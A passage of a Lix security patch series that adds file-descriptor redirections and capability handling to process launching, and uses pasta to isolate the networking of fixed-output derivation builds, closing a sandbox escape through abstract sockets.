+ } catch (ExecError & e) { + status = e.status; +@@ -277,7 +277,22 @@ RunningProgram::~RunningProgram() + } + } + +-void RunningProgram::wait() ++std::tuple, int> RunningProgram::release() ++{ ++ return {pid.release(), std::move(stdoutSource), stdout_.release()}; ++} ++ ++int RunningProgram::kill() ++{ ++ return pid.kill(); ++} ++ ++int RunningProgram::wait() ++{ ++ return pid.wait(); ++} ++ ++void RunningProgram::waitAndCheck() + { + if (std::uncaught_exceptions() == 0) { + int status = pid.wait(); +diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh +index e9e4eb15a..01c42b9fc 100644 +--- a/lix/libutil/processes.hh ++++ b/lix/libutil/processes.hh +@@ -102,9 +102,23 @@ private: + + public: + RunningProgram() = default; ++ RunningProgram(RunningProgram &&) = default; ++ RunningProgram & operator=(RunningProgram &&) = default; + ~RunningProgram(); + +- void wait(); ++ explicit operator bool() const { return bool(pid); } ++ ++ std::tuple, int> release(); ++ ++ 
int kill(); ++ [[nodiscard]] ++ int wait(); ++ void waitAndCheck(); ++ ++ std::optional getStdoutFD() const ++ { ++ return stdout_ ? std::optional(stdout_.get()) : std::nullopt; ++ } + + Source * getStdout() const { return stdoutSource.get(); }; + }; +-- +2.49.0 + + +From 7f127054bec18da811bf3364909870f7a54f6b8d Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Mon, 17 Mar 2025 15:45:27 +0100 +Subject: [SECURITY FIX 08/12] libutil: add generic redirections runProgram2 + +explicit stderr redirection makes mergeStderrToStdout unnecessary also. + +Change-Id: I63de929e6dc53f6c5ceb2d43c2ce288bfc04d872 +--- + lix/libfetchers/git.cc | 23 +++++++++++++++++------ + lix/libstore/build/derivation-goal.cc | 2 +- + lix/libstore/globals.cc | 12 ++++++++++-- + lix/libstore/ssh.cc | 1 + + lix/libutil/processes.cc | 8 +++++--- + lix/libutil/processes.hh | 7 ++++++- + 6 files changed, 40 insertions(+), 13 deletions(-) + +diff --git a/lix/libfetchers/git.cc b/lix/libfetchers/git.cc +index 3231ec011..aa3ef7150 100644 +--- a/lix/libfetchers/git.cc ++++ b/lix/libfetchers/git.cc +@@ -22,6 +22,7 @@ + #include + #include + #include ++#include + + using namespace std::string_literals; + +@@ -164,11 +165,19 @@ WorkdirInfo getWorkdirInfo(const Input & input, const Path & workdir) + + /* Check whether HEAD points to something that looks like a commit, + since that is the refrence we want to use later on. */ +- auto result = runProgram(RunOptions { ++ auto result = runProgram(RunOptions{ + .program = "git", +- .args = { "-C", workdir, "--git-dir", gitDir, "rev-parse", "--verify", "--no-revs", "HEAD^{commit}" }, ++ .args = ++ {"-C", ++ workdir, ++ "--git-dir", ++ gitDir, ++ "rev-parse", ++ "--verify", ++ "--no-revs", ++ "HEAD^{commit}"}, + .environment = env, +- .mergeStderrToStdout = true ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + auto exitCode = WEXITSTATUS(result.first); + auto errorMessage = result.second; +@@ -709,10 +718,12 @@ struct GitInputScheme : InputScheme + AutoDelete delTmpDir(tmpDir, true); + PathFilter filter = defaultPathFilter; + +- auto result = runProgram(RunOptions { ++ auto result = runProgram(RunOptions{ + .program = "git", +- .args = { "-C", repoDir, "--git-dir", gitDir, "cat-file", "commit", input.getRev()->gitRev() }, +- .mergeStderrToStdout = true ++ .args = ++ {"-C", repoDir, "--git-dir", gitDir, "cat-file", "commit", input.getRev()->gitRev() ++ }, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + if (WEXITSTATUS(result.first) == 128 + && result.second.find("bad file") != std::string::npos) +diff --git a/lix/libstore/build/derivation-goal.cc b/lix/libstore/build/derivation-goal.cc +index 69e654490..48d38ffb4 100644 +--- a/lix/libstore/build/derivation-goal.cc ++++ b/lix/libstore/build/derivation-goal.cc +@@ -891,7 +891,7 @@ void runPostBuildHook( + .program = settings.postBuildHook, + .environment = hookEnvironment, + .captureStdout = true, +- .mergeStderrToStdout = true, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + Finally const _wait([&] { + try { +diff --git a/lix/libstore/globals.cc b/lix/libstore/globals.cc +index 9221da32b..b4328b068 100644 +--- a/lix/libstore/globals.cc ++++ b/lix/libstore/globals.cc +@@ -242,9 +242,17 @@ StringSet Settings::getDefaultExtraPlatforms() + // machines. Note that we can’t force processes from executing + // x86_64 in aarch64 environments or vice versa since they can + // always exec with their own binary preferences. 
+- if (std::string{SYSTEM} == "aarch64-darwin" && +- runProgram(RunOptions {.program = "arch", .args = {"-arch", "x86_64", "/usr/bin/true"}, .mergeStderrToStdout = true}).first == 0) ++ if (std::string{SYSTEM} == "aarch64-darwin" ++ && runProgram(RunOptions{ ++ .program = "arch", ++ .args = {"-arch", "x86_64", "/usr/bin/true"}, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}} ++ } ++ ).first ++ == 0) ++ { + extraPlatforms.insert("x86_64-darwin"); ++ } + #endif + + return extraPlatforms; +diff --git a/lix/libstore/ssh.cc b/lix/libstore/ssh.cc +index b43cc50a9..2b329f231 100644 +--- a/lix/libstore/ssh.cc ++++ b/lix/libstore/ssh.cc +@@ -8,6 +8,7 @@ + #include "lix/libutil/strings.hh" + #include "lix/libstore/temporary-dir.hh" + #include ++#include + + namespace nix { + +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index 6b24d943f..0dcd96ba9 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -330,9 +330,11 @@ RunningProgram runProgram2(const RunOptions & options) + replaceEnv(*options.environment); + if (options.captureStdout && dup2(out.writeSide.get(), STDOUT_FILENO) == -1) + throw SysError("dupping stdout"); +- if (options.mergeStderrToStdout) +- if (dup2(STDOUT_FILENO, STDERR_FILENO) == -1) +- throw SysError("cannot dup stdout into stderr"); ++ for (auto redirection : options.redirections) { ++ if (dup2(redirection.to, redirection.from) == -1) { ++ throw SysError("dupping fd %i to %i", redirection.from, redirection.to); ++ } ++ } + + if (options.chdir && chdir((*options.chdir).c_str()) == -1) + throw SysError("chdir failed"); +diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh +index 01c42b9fc..3311b8fb8 100644 +--- a/lix/libutil/processes.hh ++++ b/lix/libutil/processes.hh +@@ -76,6 +76,11 @@ std::string runProgram(Path program, bool searchPath = false, + + struct RunOptions + { ++ struct Redirection ++ { ++ int from, to; ++ }; ++ + Path program; + bool searchPath = true; + Strings args = {}; +@@ -84,8 +89,8 @@ struct RunOptions + std::optional chdir = {}; + std::optional> environment = {}; + bool captureStdout = false; +- bool mergeStderrToStdout = false; + bool isInteractive = false; ++ std::vector redirections; + }; + + struct [[nodiscard("you must call RunningProgram::wait()")]] RunningProgram +-- +2.49.0 + + +From 582f775ac358f9da682f707a3f58f228f7fdaed8 Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Fri, 28 Mar 2025 23:16:01 +0100 +Subject: [SECURITY FIX 09/12] libutil: add capability support to runProgram2 + +launching pasta to not run as root will ambient require capabilities. + +Change-Id: I1dd2506a1fa3944a9d9062123ef8a74903c597ea +--- + lix/libutil/processes.cc | 47 ++++++++++++++++++++++++++++++++++++++++ + lix/libutil/processes.hh | 3 +++ + 2 files changed, 50 insertions(+) + +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index 0dcd96ba9..2f214e552 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -22,6 +22,7 @@ + #endif + + #ifdef __linux__ ++# include + # include + # include + #endif +@@ -338,6 +339,13 @@ RunningProgram runProgram2(const RunOptions & options) + + if (options.chdir && chdir((*options.chdir).c_str()) == -1) + throw SysError("chdir failed"); ++ ++#if __linux__ ++ if (!options.caps.empty() && prctl(PR_SET_KEEPCAPS, 1) < 0) { ++ throw SysError("setting keep-caps failed"); ++ } ++#endif ++ + if (options.gid && setgid(*options.gid) == -1) + throw SysError("setgid failed"); + /* Drop all other groups if we're setgid. 
*/
+@@ -346,6 +354,45 @@ RunningProgram runProgram2(const RunOptions & options)
+     if (options.uid && setuid(*options.uid) == -1)
+         throw SysError("setuid failed");
+ 
++#if __linux__
++    if (!options.caps.empty()) {
++        if (prctl(PR_SET_KEEPCAPS, 0)) {
++            throw SysError("clearing keep-caps failed");
++        }
++
++        // we do the capability dance like this to avoid a dependency
++        // on libcap, which has a rather large build closure and many
++        // more features than we need for now. maybe some other time.
++        static constexpr uint32_t LINUX_CAPABILITY_VERSION_3 = 0x20080522;
++        static constexpr uint32_t LINUX_CAPABILITY_U32S_3 = 2;
++        struct user_cap_header_struct
++        {
++            uint32_t version;
++            int pid;
++        } hdr = {LINUX_CAPABILITY_VERSION_3, 0};
++        struct user_cap_data_struct
++        {
++            uint32_t effective;
++            uint32_t permitted;
++            uint32_t inheritable;
++        } data[LINUX_CAPABILITY_U32S_3] = {};
++        for (auto cap : options.caps) {
++            assert(cap / 32 < LINUX_CAPABILITY_U32S_3);
++            data[cap / 32].permitted |= 1 << (cap % 32);
++            data[cap / 32].inheritable |= 1 << (cap % 32);
++        }
++        if (syscall(SYS_capset, &hdr, data)) {
++            throw SysError("couldn't set capabilities");
++        }
++
++        for (auto cap : options.caps) {
++            if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0) < 0) {
++                throw SysError("couldn't set ambient caps");
++            }
++        }
++    }
++#endif
++
+     Strings args_(options.args);
+     args_.push_front(options.program);
+ 
+diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh
+index 3311b8fb8..6ca7f3bdf 100644
+--- a/lix/libutil/processes.hh
++++ b/lix/libutil/processes.hh
+@@ -91,6 +91,9 @@ struct RunOptions
+     bool captureStdout = false;
+     bool isInteractive = false;
+     std::vector redirections;
++#if __linux__
++    std::set caps;
++#endif
+ };
+ 
+-- 
+2.49.0
+
+
+From 6a61eea281de2c4d7d2b4f375511db0dacfec5ec Mon Sep 17 00:00:00 2001
+From: eldritch horrors
+Date: Fri, 28 Mar 2025 23:04:56 +0100
+Subject: [SECURITY FIX 10/12] libstore: use pasta for FODs if available
+
+This allows using a userspace program, pasta, to handle comms between
+the build sandbox and the outside world, allowing for full isolation
+including the network namespace, closing the "fixed-output derivation
+talks to the host over an abstract domain socket" hole for good.
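+
+When built with pasta support, enabling the isolation is a single daemon
+setting (illustrative path; it depends on where pasta is installed):
+
+    # nix.conf sketch: enable pasta-based isolation for fixed-output builds
+    pasta-path = /run/current-system/sw/bin/pasta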
+ +Co-Authored-By: Puck Meerburg +Change-Id: Ifd499b7dbb3784600a6e842fede65fc031ff9f15 +--- + doc/manual/rl-next/pasta.md | 20 +++ + lix/libstore/build/local-derivation-goal.cc | 40 +++++- + lix/libstore/build/local-derivation-goal.hh | 15 +++ + lix/libstore/globals.cc | 3 + + lix/libstore/meson.build | 7 ++ + lix/libstore/platform/linux.cc | 133 +++++++++++++++++++- + lix/libstore/platform/linux.hh | 18 +++ + lix/libstore/settings/pasta-path.md | 10 ++ + meson.build | 7 ++ + meson.options | 4 + + misc/passt.nix | 64 ++++++++++ + package.nix | 6 + + tests/nixos/ca-fd-leak/default.nix | 90 ------------- + tests/nixos/ca-fd-leak/sender.c | 65 ---------- + tests/nixos/ca-fd-leak/smuggler.c | 66 ---------- + tests/nixos/default.nix | 2 - + tests/nixos/fetchurl.nix | 2 +- + 17 files changed, 323 insertions(+), 229 deletions(-) + create mode 100644 doc/manual/rl-next/pasta.md + create mode 100644 lix/libstore/settings/pasta-path.md + create mode 100644 misc/passt.nix + delete mode 100644 tests/nixos/ca-fd-leak/default.nix + delete mode 100644 tests/nixos/ca-fd-leak/sender.c + delete mode 100644 tests/nixos/ca-fd-leak/smuggler.c + +diff --git a/doc/manual/rl-next/pasta.md b/doc/manual/rl-next/pasta.md +new file mode 100644 +index 000000000..a7b7aa952 +--- /dev/null ++++ b/doc/manual/rl-next/pasta.md +@@ -0,0 +1,20 @@ ++--- ++synopsis: "Fixed output derivations can be run using `pasta` network isolation" ++cls: [] ++issues: [fj#285] ++category: "Breaking Changes" ++credits: [horrors, puck] ++--- ++ ++Fixed output derivations traditionally run in the host network namespace. ++On Linux this allows such derivations to communicate with other sandboxes ++or the host using the abstract Unix domains socket namespace; this hasn't ++been unproblematic in the past and has been used in two distinct exploits ++to break out of the sandbox. For this reason fixed output derivations can ++now run in a network namespace (provided by [`pasta`]), restricted to TCP ++and UDP communication with the rest of the world. When enabled this could ++be a breaking change and we classify it as such, even though we don't yet ++enable or require such isolation by default. We may enforce this in later ++releases of Lix once we have sufficient confidence that breakage is rare. ++ ++[`pasta`]: https://passt.top/ +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index c33bd8283..7ccb0ad33 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -13,6 +13,8 @@ + #include "lix/libutil/archive.hh" + #include "lix/libstore/daemon.hh" + #include "lix/libutil/regex.hh" ++#include "lix/libutil/file-descriptor.hh" ++#include "lix/libutil/file-system.hh" + #include "lix/libutil/result.hh" + #include "lix/libutil/topo-sort.hh" + #include "lix/libutil/json.hh" +@@ -24,6 +26,7 @@ + #include "lix/libutil/mount.hh" + #include "lix/libutil/strings.hh" + #include "lix/libutil/thread-name.hh" ++#include "platform/linux.hh" + + #include + #include +@@ -1073,7 +1076,7 @@ void LocalDerivationGoal::runChild() + /* N.B. it is realistic that these paths might not exist. It + happens when testing Nix building fixed-output derivations + within a pure derivation. 
*/ +- for (auto & path : { "/etc/resolv.conf", "/etc/services", "/etc/hosts" }) ++ for (auto & path : { "/etc/services", "/etc/hosts" }) + if (pathExists(path)) { + // Copy the actual file, not the symlink, because we don't know where + // the symlink is pointing, and we don't want to chase down the entire +@@ -1094,6 +1097,11 @@ void LocalDerivationGoal::runChild() + copyFile(path, chrootRootDir + path, { .followSymlinks = true }); + } + ++ if (pathExists("/etc/resolv.conf")) { ++ const auto resolvConf = rewriteResolvConf(readFile("/etc/resolv.conf")); ++ writeFile(chrootRootDir + "/etc/resolv.conf", resolvConf); ++ } ++ + if (settings.caFile != "" && pathExists(settings.caFile)) { + // For the same reasons as above, copy the CA certificates file too. + // It should be even less likely to change during the build than resolv.conf. +@@ -1221,6 +1229,36 @@ void LocalDerivationGoal::runChild() + if (setuid(sandboxUid()) == -1) + throw SysError("setuid failed"); + ++ if (runPasta) { ++ // wait for the pasta interface to appear. pasta can't signal us when ++ // it's done setting up the namespace, so we have to wait for a while ++ AutoCloseFD fd(socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)); ++ if (!fd) throw SysError("cannot open IP socket"); ++ ++ struct ifreq ifr; ++ strcpy(ifr.ifr_name, LinuxLocalDerivationGoal::PASTA_NS_IFNAME); ++ // wait two minutes for the interface to appear. if it does not do so ++ // we are either grossly overloaded, or pasta startup failed somehow. ++ static constexpr int SINGLE_WAIT_US = 1000; ++ static constexpr int TOTAL_WAIT_US = 120'000'000; ++ for (unsigned tries = 0; ; tries++) { ++ if (tries > TOTAL_WAIT_US / SINGLE_WAIT_US) { ++ throw Error( ++ "sandbox network setup timed out, please check daemon logs for " ++ "possible error output." ++ ); ++ } else if (ioctl(fd.get(), SIOCGIFFLAGS, &ifr) == 0) { ++ if ((ifr.ifr_ifru.ifru_flags & IFF_UP) != 0) { ++ break; ++ } ++ } else if (errno == ENODEV) { ++ usleep(SINGLE_WAIT_US); ++ } else { ++ throw SysError("cannot get loopback interface flags"); ++ } ++ } ++ } ++ + setUser = false; + } + #endif +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index eb2fe50f3..a0031e141 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -285,6 +285,12 @@ struct LocalDerivationGoal : public DerivationGoal + protected: + using DerivationGoal::DerivationGoal; + ++ /** ++ * Whether to run pasta for network-endowed derivations. Running pasta ++ * currently requires actively waiting for its net-ns setup to finish. ++ */ ++ bool runPasta = false; ++ + /** + * Setup dependencies outside the sandbox. + * Called in the parent nix process. +@@ -294,6 +300,15 @@ protected: + throw Error("sandboxing builds is not supported on this platform"); + }; + ++ /** ++ * Rewrite resolv.conf for use in the sandbox. Used in the linux platform ++ * to replace nameservers * when using pasta for fixed output derivations. ++ */ ++ virtual std::string rewriteResolvConf(std::string fromHost) ++ { ++ return fromHost; ++ } ++ + /** + * Create a new process that runs `openSlave` and `runChild` + * On some platforms this process is created with sandboxing flags. 
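+
+As an illustration of the `rewriteResolvConf` hook declared above (host
+value invented for the example), a host resolv.conf containing
+
+    nameserver 127.0.0.53
+
+is rewritten inside the sandbox to point at the pasta DNS forwarder:
+
+    nameserver 169.254.1.1
+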
+diff --git a/lix/libstore/globals.cc b/lix/libstore/globals.cc +index b4328b068..7fc4c6a21 100644 +--- a/lix/libstore/globals.cc ++++ b/lix/libstore/globals.cc +@@ -87,6 +87,9 @@ Settings::Settings() + #if defined(__linux__) && defined(SANDBOX_SHELL) + sandboxPaths.setDefault(tokenizeString("/bin/sh=" SANDBOX_SHELL)); + #endif ++#if defined(__linux__) && defined(PASTA_PATH) ++ pastaPath.setDefault(PASTA_PATH); ++#endif + + /* chroot-like behavior from Apple's sandbox */ + #if __APPLE__ +diff --git a/lix/libstore/meson.build b/lix/libstore/meson.build +index e59ae01b5..628ec1e55 100644 +--- a/lix/libstore/meson.build ++++ b/lix/libstore/meson.build +@@ -82,6 +82,7 @@ libstore_setting_definitions = files( + 'settings/narinfo-cache-negative-ttl.md', + 'settings/narinfo-cache-positive-ttl.md', + 'settings/netrc-file.md', ++ 'settings/pasta-path.md', + 'settings/plugin-files.md', + 'settings/post-build-hook.md', + 'settings/pre-build-hook.md', +@@ -326,6 +327,12 @@ elif busybox.found() + } + endif + ++if pasta.found() ++ cpp_str_defines += { ++ 'PASTA_PATH': pasta.full_path(), ++ } ++endif ++ + cpp_args = [] + + foreach name, value : cpp_str_defines +diff --git a/lix/libstore/platform/linux.cc b/lix/libstore/platform/linux.cc +index f8b721475..722135081 100644 +--- a/lix/libstore/platform/linux.cc ++++ b/lix/libstore/platform/linux.cc +@@ -1,16 +1,25 @@ + #include "lix/libstore/build/worker.hh" + #include "lix/libutil/cgroup.hh" ++#include "lix/libutil/file-descriptor.hh" ++#include "lix/libutil/file-system.hh" + #include "lix/libutil/finally.hh" + #include "lix/libstore/gc-store.hh" ++#include "lix/libutil/processes.hh" + #include "lix/libutil/signals.hh" + #include "lix/libstore/platform/linux.hh" + #include "lix/libutil/regex.hh" + #include "lix/libutil/strings.hh" + ++#include ++#include + #include + #include + #include + ++#if __linux__ ++#include ++#endif ++ + #if HAVE_SECCOMP + #include + #include +@@ -61,6 +70,14 @@ static void readFileRoots(const char * path, UncheckedRoots & roots) + } + } + ++LinuxLocalDerivationGoal::~LinuxLocalDerivationGoal() ++{ ++ // pasta being left around mostly happens when builds are aborted ++ if (pastaPid) { ++ pastaPid.kill(); ++ } ++} ++ + void LinuxLocalStore::findPlatformRoots(UncheckedRoots & unchecked) + { + auto procDir = AutoCloseDir{opendir("/proc")}; +@@ -859,6 +876,26 @@ void LinuxLocalDerivationGoal::prepareSandbox() + } + } + ++std::string LinuxLocalDerivationGoal::rewriteResolvConf(std::string fromHost) ++{ ++ if (!runPasta) { ++ return fromHost; ++ } ++ ++ static constexpr auto flags = std::regex::ECMAScript | std::regex::multiline; ++ static auto lineRegex = regex::parse("^nameserver\\s.*$", flags); ++ static auto v4Regex = regex::parse("^nameserver\\s+\\d{1,3}\\.", flags); ++ static auto v6Regex = regex::parse("^nameserver.*:", flags); ++ std::string nsInSandbox = "\n"; ++ if (std::regex_search(fromHost, v4Regex)) { ++ nsInSandbox += fmt("nameserver %s\n", PASTA_HOST_IPV4); ++ } ++ if (std::regex_search(fromHost, v6Regex)) { ++ nsInSandbox += fmt("nameserver %s\n", PASTA_HOST_IPV6); ++ } ++ return std::regex_replace(fromHost, lineRegex, "") + nsInSandbox; ++} ++ + Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + { + #if HAVE_SECCOMP +@@ -886,9 +923,11 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave) + + - The private network namespace ensures that the builder + cannot talk to the outside world (or vice versa). It +- only has a private loopback interface. 
(Fixed-output
+-       derivations are not run in a private network namespace
+-       to allow functions like fetchurl to work.)
++       only has a private loopback interface. If a copy of
++       `pasta` is available, fixed-output derivations are run
++       inside a private network namespace with internet
++       access, otherwise they are run in the host's network
++       namespace, to allow functions like fetchurl to work.
+ 
+       - The IPC namespace prevents the builder from communicating
+         with outside processes using SysV IPC mechanisms (shared
+@@ -909,6 +948,10 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave)
+     if (derivationType->isSandboxed())
+         privateNetwork = true;
+ 
++    // don't launch pasta unless we have a tun device. in a build sandbox we
++    // commonly do not, and trying to run pasta anyway naturally won't work.
++    runPasta = !privateNetwork && settings.pastaPath != "" && pathExists("/dev/net/tun");
++
+     userNamespaceSync.create();
+ 
+     Pipe sendPid;
+@@ -933,7 +976,9 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave)
+ 
+     ProcessOptions options;
+     options.cloneFlags = CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWIPC | CLONE_NEWUTS | CLONE_PARENT | SIGCHLD;
+-    if (privateNetwork)
++    // we always want to create a new network namespace for pasta, even when
++    // we can't actually run it. not doing so hides bugs and impairs purity.
++    if (settings.pastaPath != "" || privateNetwork)
+         options.cloneFlags |= CLONE_NEWNET;
+     if (usingUserNamespace)
+         options.cloneFlags |= CLONE_NEWUSER;
+@@ -1004,6 +1049,67 @@ Pid LinuxLocalDerivationGoal::startChild(std::function openSlave)
+     /* Signal the builder that we've updated its user namespace. */
+     writeFull(userNamespaceSync.writeSide.get(), "1");
+ 
++    if (runPasta) {
++        // Bring up pasta, for handling FOD networking. We don't let it daemonize
++        // itself for process management reasons and kill it manually when done.
++
++        // TODO add a new sandbox mode flag to disable all or parts of this?
++        Strings args = {
++            // clang-format off
++            "--quiet",
++            "--foreground",
++            "--config-net",
++            "--gateway", PASTA_HOST_IPV4,
++            "--address", PASTA_CHILD_IPV4, "--netmask", PASTA_IPV4_NETMASK,
++            "--dns-forward", PASTA_HOST_IPV4,
++            "--gateway", PASTA_HOST_IPV6,
++            "--address", PASTA_CHILD_IPV6,
++            "--dns-forward", PASTA_HOST_IPV6,
++            "--ns-ifname", PASTA_NS_IFNAME,
++            "--no-netns-quit",
++            "--netns", "/proc/self/fd/0",
++            // clang-format on
++        };
++
++        AutoCloseFD netns(open(fmt("/proc/%i/ns/net", pid.get()).c_str(), O_RDONLY | O_CLOEXEC));
++        if (!netns) {
++            throw SysError("failed to open netns");
++        }
++
++        AutoCloseFD userns;
++        if (usingUserNamespace) {
++            userns =
++                AutoCloseFD(open(fmt("/proc/%i/ns/user", pid.get()).c_str(), O_RDONLY | O_CLOEXEC));
++            if (!userns) {
++                throw SysError("failed to open userns");
++            }
++            args.push_back("--userns");
++            args.push_back("/proc/self/fd/1");
++        }
++
++        // FIXME ideally we want a notification when pasta exits, but we cannot do
++        // this at present. without such support we need to busy-wait for pasta to
++        // set up the namespace completely and time out after a while for the case
++        // of pasta launch failures. pasta logs go to syslog only for now as well.
++        pastaPid = runProgram2({
++            .program = settings.pastaPath,
++            .args = args,
++            .uid = useBuildUsers() ? std::optional(buildUser->getUID()) : std::nullopt,
++            .gid = useBuildUsers() ? std::optional(buildUser->getGID()) : std::nullopt,
++            // TODO these redirections are crimes.
pasta closes all non-stdio file ++ // descriptors very early and lacks fd arguments for the namespaces we ++ // want it to join. we cannot have pasta join the namespaces via pids; ++ // doing so requires capabilities which pasta *also* drops very early. ++ .redirections = { ++ {.from = 0, .to = netns.get()}, ++ {.from = 1, .to = userns ? userns.get() : 1}, ++ }, ++ .caps = getuid() == 0 ++ ? std::set{CAP_SYS_ADMIN, CAP_NET_BIND_SERVICE} ++ : std::set{}, ++ }); ++ } ++ + return pid; + } + +@@ -1050,5 +1156,24 @@ void LinuxLocalDerivationGoal::killSandbox(bool getStats) + This avoids processes unrelated to the build being killed, thus avoiding: https://git.lix.systems/lix-project/lix/issues/667 */ + LocalDerivationGoal::killSandbox(getStats); + } ++ ++ if (pastaPid) { ++ // FIXME we really want to send SIGTERM instead and wait for pasta to exit, ++ // but we do not have the infra for that right now. we send SIGKILL instead ++ // and treat exiting with that as a successful exit code until such a time. ++ // this is not likely to cause problems since pasta runs as the build user, ++ // but not inside the build sandbox. if it's killed it's either due to some ++ // external influence (in which case the sandboxed child will probably fail ++ // due to network errors, if it used the network at all) or some bug in lix ++ if (auto status = pastaPid.kill(); !WIFSIGNALED(status) || WTERMSIG(status) != SIGKILL) { ++ if (WIFSIGNALED(status)) { ++ throw Error("pasta killed by signal %i", WTERMSIG(status)); ++ } else if (WIFEXITED(status)) { ++ throw Error("pasta exited with code %i", WEXITSTATUS(status)); ++ } else { ++ throw Error("pasta exited with status %i", status); ++ } ++ } ++ } + } + } +diff --git a/lix/libstore/platform/linux.hh b/lix/libstore/platform/linux.hh +index 9dba7f1de..47e33f240 100644 +--- a/lix/libstore/platform/linux.hh ++++ b/lix/libstore/platform/linux.hh +@@ -4,6 +4,7 @@ + #include "lix/libstore/build/local-derivation-goal.hh" + #include "lix/libstore/gc-store.hh" + #include "lix/libstore/local-store.hh" ++#include "lix/libutil/processes.hh" + + namespace nix { + +@@ -33,6 +34,20 @@ class LinuxLocalDerivationGoal : public LocalDerivationGoal + public: + using LocalDerivationGoal::LocalDerivationGoal; + ++ ~LinuxLocalDerivationGoal(); ++ ++ // NOTE these are all C strings because macos doesn't have constexpr std::string ++ // constructors, and std::string_view is a pain to turn into std::strings again. ++ static constexpr const char * PASTA_NS_IFNAME = "eth0"; ++ static constexpr const char * PASTA_HOST_IPV4 = "169.254.1.1"; ++ static constexpr const char * PASTA_CHILD_IPV4 = "169.254.1.2"; ++ static constexpr const char * PASTA_IPV4_NETMASK = "16"; ++ // randomly chosen 6to4 prefix, mapping the same ipv4ll as above. ++ // even if this id is used on the daemon host there should not be ++ // any collisions since ipv4ll should never be addressed by ipv6. 
++    static constexpr const char * PASTA_HOST_IPV6 = "64:ff9b:1:4b8e:472e:a5c8:a9fe:0101";
++    static constexpr const char * PASTA_CHILD_IPV6 = "64:ff9b:1:4b8e:472e:a5c8:a9fe:0102";
++
+ private:
+     /*
+      * Destroy the cgroup otherwise another build
+@@ -41,6 +56,8 @@ private:
+      */
+     void cleanupHookFinally() override;
+ 
++    RunningProgram pastaPid;
++
+     /**
+      * Create and populate chroot
+      */
+@@ -68,6 +85,7 @@ private:
+         return true;
+     }
+ 
++    std::string rewriteResolvConf(std::string fromHost) override;
+ };
+ 
+ }
+diff --git a/lix/libstore/settings/pasta-path.md b/lix/libstore/settings/pasta-path.md
+new file mode 100644
+index 000000000..1df3600df
+--- /dev/null
++++ b/lix/libstore/settings/pasta-path.md
+@@ -0,0 +1,10 @@
++---
++name: pasta-path
++internalName: pastaPath
++type: Path
++default: ""
++---
++If set to an absolute path, enables full sandboxing of fixed-output
++derivations by using `pasta` to pass network traffic between the
++private network namespace and the host. This allows for greater
++isolation of builds from the host.
+diff --git a/meson.build b/meson.build
+index 92b4c05ec..adcea1142 100644
+--- a/meson.build
++++ b/meson.build
+@@ -452,6 +452,13 @@ configdata += {
+   'HAVE_DTRACE': dtrace_feature.enabled().to_int(),
+ }
+ 
++pasta_path = get_option('pasta-path')
++# we can't check the pasta version because passt misuses stdio (it calls _exit()
++# after printing the version, which will never print the version unless run from
++# a terminal). pasta isn't mandatory yet due to high fetcher breakage potential.
++# we *will* enable it in our own packaging, but distributions are not forced to.
++pasta = find_program(pasta_path, required : false, native : false)
++
+ lsof = find_program('lsof', native : true)
+ 
+ # This is how Nix does generated headers...
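+
+Distributions carrying their own passt package can point the lookup at an
+explicit binary at configure time (illustrative path), using the option
+defined in meson.options just below:
+
+    meson setup build -Dpasta-path=/usr/bin/pasta
+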
+diff --git a/meson.options b/meson.options +index 8d5eed0bc..50caa32c4 100644 +--- a/meson.options ++++ b/meson.options +@@ -24,6 +24,10 @@ option('sandbox-shell', type : 'string', value : 'busybox', + description : 'path to a statically-linked shell to use as /bin/sh in sandboxes (usually busybox)', + ) + ++option('pasta-path', type : 'string', value : 'pasta', ++ description : 'path to the location of pasta (provided by passt)', ++) ++ + option('enable-tests', type : 'boolean', value : true, + description : 'whether to enable tests or not (requires rapidcheck and gtest)', + ) +diff --git a/misc/passt.nix b/misc/passt.nix +new file mode 100644 +index 000000000..3c0c633fa +--- /dev/null ++++ b/misc/passt.nix +@@ -0,0 +1,64 @@ ++{ ++ lib, ++ stdenv, ++ buildPackages, ++ fetchurl, ++ getconf, ++ gitUpdater, ++ testers, ++}: ++ ++stdenv.mkDerivation (finalAttrs: { ++ pname = "passt"; ++ version = "2025_02_17.a1e48a0"; ++ ++ src = fetchurl { ++ url = "https://passt.top/passt/snapshot/passt-${finalAttrs.version}.tar.gz"; ++ hash = "sha256-/FUXxeYv3Lb0DiXmbS2PUzfLL5ZwHJ42tiuH7YnlljE="; ++ }; ++ ++ postPatch = '' ++ substituteInPlace Makefile --replace-fail \ ++ 'PAGE_SIZE=$(shell getconf PAGE_SIZE)' \ ++ "PAGE_SIZE=$(${stdenv.hostPlatform.emulator buildPackages} ${lib.getExe getconf} PAGE_SIZE)" ++ ''; ++ ++ makeFlags = [ ++ "prefix=${placeholder "out"}" ++ "VERSION=${finalAttrs.version}" ++ ]; ++ ++ passthru = { ++ tests.version = testers.testVersion { ++ package = finalAttrs.finalPackage; ++ }; ++ ++ 